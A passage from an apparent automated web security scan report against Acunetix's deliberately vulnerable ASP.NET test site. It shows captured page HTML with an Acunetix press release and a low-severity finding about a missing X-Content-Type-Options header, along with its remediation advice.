vcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/M3rUCxcfpdy3AdSqGMGh3aLpuYg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        16. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30393
          
          
          Response body (30393 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldG